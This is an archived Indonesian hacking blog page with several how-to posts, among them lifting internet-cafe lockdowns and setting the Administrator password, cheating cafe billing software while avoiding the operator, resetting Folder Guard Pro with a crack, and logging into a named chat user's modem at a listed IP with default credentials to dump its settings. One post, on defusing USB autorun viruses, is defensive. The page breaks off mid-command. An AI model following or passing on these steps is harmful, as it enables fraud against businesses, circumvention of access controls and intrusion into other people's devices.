 Enkripsi <br /> <br /><body> <br /><% If request.form("name") = "" Then %> <br />Username: <br /> <br />Password: <br /> <br /> <br /><% Else %> <br /><% response.write enkripsi(request.form("name"),request.form("pass")) %> <br /><% End If %> <br /> <br />CATATAN: <br /> <br />Anda dapat mengubah kode berikut sesuai dengan konfigurasi situs anda <br /> <br />misalnya menjadi seperti ini: <br /> <br /> <br />Fungsi ini tidak dapat dibalik, maksudnya jika user lupa password, maka harus diberikan password baru. Tapi kita tidak membahas masalah fitur ini. Disini saya hanya menerangkan metode enkripsi password melalui pemrograman ASP. <br /> Meskipun script ini bukan enkripsi tingkat tinggi, tapi cukup efektif dalam mengelabui hacker-hacker kelas teri (sorry kagak bermaksud menghina, tapi iya khan? hehe). Untuk yang hacker kelas berat, kita memerlukan area secure yang terenkripsi, seperti https:// <br /> <br /></span> <a href='http://trycahgo.blogspot.com/2009/08/pemrograman-asp-untuk-mengenkripsi.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='3895233643531163891'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/08/trik-mereset-password-windows-9x.html'>Trik Mereset Password Windows 9x</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Password pada windows 9x sebenarnya sangat rentan dan tidak di disain untuk menjaga keamanan usernya. System operasi ini sebenarnya hanyalah untuk penggunaan personal atau yang dinamakan home user. <br /><span class="fullpost"><br />Trik berikut bisa anda gunakan untuk mengganti password ataupun mematikan password pada system operasi windows 9x. Sebenarnya password pada 9x tidak terlalu berguna, misalkan pada saat di minta memasukkan password toh kita bisa menekan escape dan segalanya selesai. Hanya saja jika tekan escape, maka otomatis fasilitas jaringan tidak akan di jalankan.<br />Gimana jika ada password yang ingin kita ganti ? setiap kita memasukkan nama dan password pada 9x, maka akan diciptakan file dengan format namalogin.pwl. Anda tinggal cari file ini kemudian hapus dan account itu anda tinggal create ulang. Dengan cara ini pula anda bisa mengetahui ada account apa-apa saja yang terdapat pada windows 9x anda. <br />Semoga sedikit trik ini berguna buat kita semua. <br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/08/trik-mereset-password-windows-9x.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Sistem%20Operasi' rel='tag'>Sistem Operasi</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='4198944864243391658'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/08/trik-jitu-ampuh-menghadapi-billing.html'>TRIK JITU AMPUH MENGHADAPI BILLING EXPLORER YANG MEMATIKAN AKSES BILA SEDANG BERINTERNET</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Sebelumnya saya ucapkan banyak terima kasih buat Jasakom community. Terimakasih buat para hacker mania and cracker mania yang dulu sudah mengajari aku banyak hal, maka ijinkan saya mereview your coretan kembali. Sering kita ke warnet yang banyak mengunci berbagai akses seperti windows explorer tidak bisa dibuka, klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa...betapa sedihnyakan... apalagi bagi saya yang telah terbiasa dengan shortcut windows xp, misalnya membuka windows explorer: <br />Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara <br />tombol Ctrl dan tombol alt. ingin tahu caranya...nih silakan coba... <br />Sebenarnya cara ini telah lama saya coba dan ternyata berhasil (praktek di komputer sendiri dan beberapa warnet yang menggunakan billing explorer) Mohon maaf kepada pembuat Billing Explorer...untuk tidak berpanjang lebar langsung aja ya... <br /><br /><span class="fullpost"><br />Pertama Buka GPEdit.msc dulu <br />caranya: <br />C:\Windows\System32\GPEdit.msc <-- double Click <br />1. Jika Klik Kanan di Desktop tidak bisa <br />Masuk Ke GPEdit.msc <br />Masuk ke [User Configuration/Administrative Templates/Desktop] <br />- Disable (Hide and disable all items on the desktop) <br />Jika MyComputer tidak ada <br />- Disable (Remove My Computer icon on the Desktop) <br />2. Jika Ingin mengubah properties pada taskbar start menu <br />masuk ke [User Configuration/Administrative Templates/Start Menu and Taskbar] <br />- Disable (Prevent changes to Taskbar and Start Menu Settings) <br />Jika Menu Run tidak muncul <br />- Disable (Remove Run menu from Start Menu) <br />Jika menu pada taskbar saat klik kanan tidak muncul <br />- Disable (Remove access to the context menus for the taskbar) <br />3. Apabila Control Panel tidak bisa di akses <br />Masuk ke [User Configuration/Administrative Templates/Control Panel] <br />- Disable (Prohibit access to the Control Panel) <br />4. Jika Command Prompt tidak bisa di akses <br />Masuk ke [User Configuration/Administrative Templates/System] <br />- Disable (Prevent access to the command prompt) <br />Jika Registry Editor tidak bisa di akses <br />- Disable (Prevent access to registry editing tools) <br />5. Jika Task Manager tidak bisa di akses <br />Masuk ke [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options] <br />- Disable (Remove Task Manager) <br />6. Jika Folder Options pada Windows Explorer tidak muncul <br />Masuk ke [User Configuration/Administrative Templates/Windows Component/Windows Explorer] <br />- Disable (Remove these Folder Options menu item from the Tools menu) <br />Jika Windows Key tidak berfungsi <br />- Disable (Turn off Windows+X hotkeys) <br />------------------------------------------- end -------------------------------------------- <br />--------------------------------------- Regedit. --------------------------------------- <br />==> Setelah GPEdit.msc terbuka baru buka Registry Tools <br />caranya: <br />C:\Windows\System32\regedit.exe <-- double Click <br />--- atau --- <br />C:\Windows\regedit.exe <-- double Click <br />------------------------------------------ start. ------------------------------------------ <br />Regedit 4 <br /><br />[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD] <br />"loadvxd"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] <br />"NoDrives"=dword:00000000 <br />"LinkResolveIgnoreLinkInfo"=dword:00000000 <br />"NoFolderOptions"=dword:00000000 <br />"ClearRecentDocsOnExit"=dword:00000000 <br />"NoTrayContextMenu"=dword:00000000 <br />"EnforceShellExtensionSecurity"=dword:00000000 <br />"NoPrinterTabs"=dword:00000000 <br />"NoDeletePrinter"=dword:00000000 <br />"NoAddPrinter"=dword:00000000 <br />"NoRun"=dword:00000000 <br />"NoSetFolders"=dword:00000000 <br />"NoSetTaskbar"=dword:00000000 <br />"NoClose"=dword:00000000 <br />"NoViewContextMenu"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] <br />"DisableRegistryTools"=dword:00000000 <br />"NoDispScrSavPage"=dword:00000000 <br />"NoDispAppearancePage"=dword:00000000 <br />"NoDispSettingsPage"=dword:00000000 <br />"NoAdminPage"=dword:00000000 <br />"NoProfilePage"=dword:00000000 <br />"NoDevMgrPage"=dword:00000000 <br />"NoConfigPage"=dword:0000000 <br />"NoFileSysPage"=dword:00000000 <br />"NoDispCPL"=dword:00000000 <br />"NoDispBackgroundPage"=dword:00000000 <br />"NoVirtMemPage"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network] <br />"NoFileSharingControl"=dword:00000000 <br />"NoPrintSharingControl"=dword:00000000 <br />"NoNetSetup"=dword:00000000 <br />"NoNetSetupIDPage"=dword:00000000 <br />"NoNetSetupSecurityPage"=dword:00000000 <br />"NoEntireNetwork"=dword:00000000 <br />"NoWorkgroupContents"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp] <br />"NoRealMode"=dword:00000000 <br />"Disable"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop] <br />"NoHTMLWallPaper"=dword:00000000 <br />"NoChangingWallPaper"=dword:00000000 <br />"NoCloseDragDropBands"=dword:00000000 <br />"NoMovingBands"=dword:00000000 <br />"NoAddingComponents"=dword:00000000 <br />"NoDeletingComponents"=dword:00000000 <br />"NoEditingComponents"=dword:00000000 <br />"NoClosingComponents"=dword:00000000 <br /><br />[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] <br />"NoFolderOptions"=dword:00000000 <br /><br />[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System] <br />"DisableCMD"=dword:00000000 <br />"DisableRegistryTools"=dword:00000000 <br /><br />[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Advanced] <br />"Hidden"=dword:00000000 <br />"HideFileExt"=dword:00000000 <br />"ShowSuperHidden"=dword:00000000 <br />------------------------------------------- end -------------------------------------------- <br />==> Setelah regedit.exe terbuka baru ubah password administrator <-- (Ini yang di tunggu2x) <br />caranya: <br />C:\Windows\System32\compmgmt.msc <-- double Click <br />------------------------------------------ start. ------------------------------------------ <br />Pilih: - Computer Management (Local)/System Tools/Local Users and Groups/User <br />- Klik kanan Administrator -> Set Password <br />- Ketik New Password: ********** <br />Confirm Password: ********** <br /><br />--------------------------------------- Bonus - Bonus --------------------------------------- <br />Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu <br />caranya: <br />- Masuk ke Folder misalnya: C:/Windows/System32 <br />- Trus klik salah satu file dalam folder itu <br />misalnya: TaskMgr.exe <br />- Kemudian klik menu File pada Win Explorer <br />- Run as... <br />- Klik The following user -> Masukkan passwordnya <br />Username: Administrator <br />Password: ******** <br />- Selesai <br />NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah <br />kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara <br />lain silakan anda temukan sendiri, selamat mencoba <br />Contoh lain2nya dibawah ini........... <br />1. Membuka MSConfig dari Windows Explorer <br />Caranya: <br />C:\WINDOWS\pchealth\helpctr\binaries\MSConfig.exe <br />2. Membuka Sysedit dari Windows Explorer <br />Caranya: <br />C:\Windows\System32\Sysedit.exe <br /><br />3. Membuka Task Manager <br />Caranya: <br />C:\Windows\System32\taskmgr.exe <br />4. Membuka Services.msc <br />Caranya: <br />C:\Windows\System32\services.msc <br />5. Membuka Disk Management System (Melihat Partisi Harddisk) <br />Caranya: <br />C:\Windows\System32\diskmgmt.msc <br />6. Membuka Computer Management Services <br />Caranya: <br />C:\Windows\System32\compmgmt.msc <br />7. Membuka Shortcut to desktop <br />Caranya: <br />C:\Windows\System32\Show Desktop <br />8. Membuka Defragment <br />Caranya <br />C:\Windows\System32\dfrg.msc <br /><br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/08/trik-jitu-ampuh-menghadapi-billing.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='1018944117029425447'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/08/menyembunyikan-drive-di-pc.html'>Menyembunyikan Drive di PC</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> sebenernya ga ada persipan khusus buat ngilangin drive di PC km, cuma ngerubah registry aja kok, berarti yang kamu butuhkan just only PC yang pake OS Win XP (all SP) n Win ME, (kalo di 98 blm dicoba). itu aja......<br /><br />Nah skr ikutin langkah2 nya:<br /><br /><span class="fullpost"><br />1. Klik tombol START trus lo pilih RUN di jendela RUN tadi itu lo ketik "Regedit" (gak pake tanda kutip)<br /> 2. Nah skr lo dah di jendela Registry Editor, trus cari HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer<br />3. Buka folder EXPLORER tadi, trus klik kanan di area kosong di panel bagian kanan, klik NEW trus klik DWORD Value, trus beri nama NoDrives<br />4. klik ganda NoDrives tadi, trus ubah angka di value data nya sesuai dgn drive mana yg mau lo ilangin, ni angka bwt ngilangin drive nya: <br /><br />Drive A = 1 Drive H = 128 Ngilangin semua drive = 67108863 <br />Drive B = 2 Drive I = 256<br />Drive C = 4 Drive J = 512<br />Drive D = 8 Drive K = 1024<br />Drive E = 16 Drive L = 2048<br />Drive F = 32 Drive M = 4096<br />Drive G = 64 Drive N = 8192<br />5. kalo udah, close registry editornya trus restart PC nya...!!<br /><br />6. kalo udah lo restart buka My Computer trus liat, ga ada kan drive yang dah lo ilangin tadi....<br /><br />7. tenang aja semua data yang ada di drive tadi aman kok.....suerrr!!!! <br /><br />==============================================<br />CARA NGEMBALIIN KE SEPERTI SEMULA:<br /><br />1. ikuti langkah diatas (no 1 ampe no 2) yach!!!!!<br /><br />2. Buka folder EXPLORER nya, trus cari NoDrives nya <br /><br />3. Nah di jendela NoDrives, rubah Value Data yang tadinya 4 (misal: untuk drive C) atau angka drive yang dah lo masukin, trus ganti jadi 0 (nol), atau hapus aja langsung nama file NoDrives tadi <br /><br />4. Restart tuch PC, and than liat aja di my computer drive yang diilangin tadi pasti udah ada......<br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/08/menyembunyikan-drive-di-pc.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='8132894102388266525'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/08/mencurangi-hampir-semua-jenis-billing.html'>Mencurangi (hampir) Semua Jenis Billing Warnet</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Artikel ini dibuat oleh seorang newbie dan lamer bernama Blizbs_Uchiha dan ditujukan oleh newbie2 laennya. Buat mas-mas dan om-om yang merasa udah merasa pinter ato udah tau caranya sangat disarankan untuk tidak usah membaca artikel ini karena hanya membuang2 waktu anda yang sangat berharga. <br /><br />Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi <br />Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.<br />Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)<br />Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!<br /><br /><br /><span class="fullpost"><br />Penasaran mau tau caranya ? Baca aja sampai habis ! <br />Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya? <br /><br />Ini dia caranya ...<br />Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.<br />Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan <br /><br />Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.<br /><br />Yang harus disiapkan:<br />1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.<br /><br /><br /><br />Langkah-langkahnya:<br /><br />01. Masuk warnet dan pasang muka bego biar ga dicurigai operator<br />02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.<br />03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.<br />04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.<br />05. Saat masuk login screen, login aja seperti biasa.<br />06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.<br />07. Setelah ZHider dijalankan langsung aja logout.<br />08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!<br />09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.<br />10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana <br />11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.<br />12. Logout. SIapkan muka bego, lalu bayar tarif.<br /><br />Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.<br /><br />Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider<br /><br />CTRL+ALT+Z Menyembunyikan jendela aktif<br />CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan<br />CTRL+ALT+L Menampilkan dialog zhider<br />CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.<br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/08/mencurangi-hampir-semua-jenis-billing.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='2033152868986304871'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/08/menjebol-password-folder-guard-pro-52.html'>Menjebol Password FOLDER GUARD Pro 5.2</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Keamanan memang sangat penting melihat perkembangan teknologi informasi yang demikian pesat sekarang ini, namun teknologi kejahatan saat ini masih lebih unggul satu tingkat dibanding dengan pencegahannya. Tapi itu tidak menjadi landasan untuk kita bisa terus mengikuti perkembangan Teknologi security yang mungkin akan lebih maju.<br /><br />Mungkin Anda pernah mendengar salah satu tools proteksi berbasis windows yang sangat terkenal yaitu FOLDER GUARD, versi terbarunya FOLDER GUARD PRO 5.3, untuk FOLDER GUARD PRO 5.2 bisa Anda cari di www.google.com, & dan cracknya di http://paulyoung.yeah.net. <br /><br />Software ini memang dibilang sangat handal dibanding dengan software proteksi lainya , karena bisa menghiddenkan subkey yang berhubungan dengan system folder guard tersebut, sehingga akan membuat kita kesulitan untuk melihat sejauh mana sistem tersebut. Tapi perlu diketahui banyak software proteksi yang memberikan fitur-fitur praktis, sehingga akan memudahkan penggunanya dan akan mengundang adanya hole pada software itu sendiri, Contohnya FOLDER GUARD PRO 5.2. <br /><br /><br /><span class="fullpost"><br />Sewaktu kita instalasi software ini, kita akan diminta untuk mengeset apa yang perlu diproteksi, apakah folder atau sistem, baru kita akan diminta untuk memasukan password Administrator dan Master dan setelah itu di save. <br /><br />Password Administrator berfungsi untuk kita menjalankan folder Guard, sedangkan password Master berfungsi untuk menjalankan Toggle protection sehingga proteksi proteksi folder guard bisa dibikin enabled atau disabled secara cepat tanpa perlu konfigurasi. <br /><br />Nah biasanya setelah kita instalasi folder guard dia akan membuat folder di directory windows\desktop\Folder Guard. Mungkin Anda sudah nggak sabar denger ocehan saya. Sekarang coba anda klik file Reset password yang ada di \windows\desktop\Folder Guard. Setelah itu Anda akan diminta Mengisi form registrasi pertama kalian, sebelumnya saya ingatkan anda diminta mencari dulu crack buat folder guard pro 5.2 setelah itu isi form registrasi harus sama dengan yang anda isi sewaktu instalasi pertama. Nah dengan cara tersebut diatas kita akan masuk ke folder guard tanpa password.<br /> <br /><br /> <br />Tapi yang menjadi masalah jika posisi kita diwarnet atau di kantor yang menggunakan software folder guard , tentunya kita masukin username serta registrasi code kita dg menggunakan software Cracking folder guard pro 5.2, hal itu tidak akan berhasil Karena dia akan meminta user name registrasi serta codenya sewaktu install pertama bukan registrasi code yang baru.<br /><br /><br />Sekarang bagaimana kalau di warnet atau kantor mudah saja, coba Anda copykan file Fgkey.exe, Fguard32.dll, Fguard.vxd dari komputer Anda yang ada didirektory \Program Files\WinAbility\Folder Guard\ kedalam disket, kalau sudah klik tombol start trus run, ketik regedit kalau regedit dikunci Anda import aja file .reg yang berisikan disabled registry tools dari disket Anda lalu klik kanan, kalau sudah masuk ke subkey \HKEY_LOCAL_MACHINE\Software\Winability\Folder Guard\Setup\1, setelah itu delete key yang name valuenya info. <br /><br /><br />Sekarang buat shortcut untuk file fgkey.exe yang ada di drive A, trus tambahkan options / pw,pada command line “A:\fgkey” /pw , isi nama shortcutnya dengan reset.<br /><br /> <br /> <br />lalu kalian klik shortcut reset tersebut kemudian klik continue pada form registrasi, jika keluar message “The Administrator's Password For Folder Guard has been reset” berarti Selamat anda telah berhasil menembus password administrator folder guard pro 5.2. Perlu diketahui cara ini juga sudah saya coba pada Folder Guard pro 5.3 yang terbaru dan berhasil, sekarang coba jalankan program folder guardnya, kalian masuk tanpa password setelah itu kalian bisa rubah setting proteksinya sekaligus mengganti passwordnya eh nggak boleh jahat. Artikel ini saya buat untuk tujuan security, sehingga para pemilik warnet bisa lebih hati-hati & waspada dalam hal proteksi sistem. <br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/08/menjebol-password-folder-guard-pro-52.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='3945163627472729393'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/08/membuat-flashdisk-aman-dari-autorun-nya.html'>Membuat flashdisk aman dari autorun-nya si-virus</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Baiklah saya akan mulai membahasnya sekarang, diawali dengan cara penularan virus lewat media flashdisk. Sebenarnya sangat simple, ketika flashdisk dicolokan kedalam port usb virus yang sedang berjalan tinggal men-copy dirinya sendiri ke dalam flashdisk, dan tidak lupa pula dengan membuat file “autorun.inf” yang letak file-nya kasat mata sehingga tidak dapat dilihat. nah… file inilah yang akan kita edit agar virusnya tidak dapat menjalankan dirinya di komputer kita.<br /><span class="fullpost"><br />Cara yang pertama dengan mengedit secara manual dengan menggunakan notepad atau wordpad. Diasumsikan flashdisk kita yang telah dicolokan kedalam komputer (yang telah terinfeksi) beralamat “F:\”, maka saya akan mencoba membuka file “F:\autorun.inf” lalu enter. Lalu notepad akan terbuka secara otomatis, setelah itu kita tinggal mengedit dengan memblock semua (ctrl+a) lalu hapus(backspace atau del) lalu anda bisa membiarkannya kosong lalu tekan ctrl+s untuk men-savenya. <br /> <br />Tetapi bang blckflcn, bagaimana jika file tersebut memiliki attribute “read-only”? yang jelas kita tidak dapat mengeditnya secara manual!(aaaaarrrrrgh!!!!). Lalu? Apa yang dapat kita lakukan… bang blckflcn? <br /> <br /> Caranya :<br />1)buka aplikasi notepad (tempat dimana kita akan menulis script)<br />2)tuliskan script “del /a:r f:\autorun.inf” (tnp tanda petik) lalu enter.<br />3)langkah selajutnya adalah tulis script lagi! script nya “echo ‘terserah tulisan apa’ >f:\autorun.inf&attrib +r f:\autorun.inf” (tnp tanda petik juga).<br />4)lalu save file script tersebut dengan nama file terserah anda dan path-nya terserah anda juga, tetapi extension-nya harus “.bat”(harus tidak boleh tidak)<br />5)lalu jalankan file script yang baru kita buat tersebut<br />6)buka explorer<br />7)pada bagian address tuliskan “F:\autorun.inf”, lalu tekan enter <br /> <br />Setelah beberapa step tadi, virus tidak dapat menjalankan dirinya di komputer lain ketika kita mencolokan flashdisk kita kedalam port usb-nya. Tetapi bang blckflcn, virus2 dari komputer yang terinfeksi tersebut masih ada di dalam flashdisk saya. Bagaimana ini? Yah, itu sih bukan tugas saya lagi. Itu sih sudah menjadi tugas anti-virus… saya hanya memberitahukan cara agar virusnya tidak berjalan ketika flashdisk kita dicolokan kedalam port usb pada komputer yang lain… lagian mantra yang saya punya masih belum begitu ampuh untuk membuat virus tidak berjalan di komputer. Oleh karena itu, saya akan belajar tentang mantra2 tersebut di hogwarts agar lebih ampuh. <br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/08/membuat-flashdisk-aman-dari-autorun-nya.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/dunia%20komputer' rel='tag'>dunia komputer</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='965109098085084804'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/08/hacking-speedy.html'>Hacking Speedy</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Saya pernah merasa tertantang ada seorang anak di mirc Allnetwork merasa dirinya hebat lalu saya mencoba ceking ip nya rupanya percuma kita ddos karena IP dia random setiap sekali down ip dia ganti.<br /><br />Dan jangan lupa lagi bahwa setiap ID itu berdasarkan Line tlp setau saya seh begitu jadi kalau kita hack usernya sama aja jadi selusinya gimana Ya kita bobol server nya ihhiihihihih…<br />co_exmud is User10@125.164.72.124 * Ashof Yusiko<br />co_exmud on #surabaya #Malang<br /><br /><br /><span class="fullpost"><br />Saya akan mencoba masuk ke server dia karena saya lihat dari ident nya dia User10 berarti tidak jauh dia main di warnet dia user hehehe Allnet kan orangnya begitu tau dikit udah maju …. hi hi hi hi<br />setau saya semuanya user speedy memakai Modem kalau enngak salah ya, Jadi dia mempunyai web basic untuk meremote atau mensetnya..<br />http://125.164.72.124/ << bukak di IE anda masukan default dari pass modem PRolink seri itu Login : admin Password : password<br />Dam…. masuk kita ke modem mereka dah sekarang kita mau mendapatkan password dan Login nya kita dump ..<br />create user name admin passwd password root<br />size maxvc 8 max1483vc 8 maxppe 8 maxl2tptunnel 1 maxl2tpsesspertunnel 1 maxl2tppeerrws 4<br />modify system contact “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” model “H90″ location “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” vendor “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” logthresh 1 systime “Jan 01 01:01:08 1970″ timezone “GMT” magicnum 125<br />modify bridge mode enable<br />create pfraw rule entry ruleid 15 ifname private dir in act deny<br />create pfraw rule entry ruleid 16 ifname private act deny<br />create pfraw rule entry ruleid 17 ifname private dir in act deny<br />create pfraw rule entry ruleid 18 ifname private act deny<br />create pfraw rule entry ruleid 19 ifname private dir in act deny<br />create pfraw rule entry ruleid ifname private act 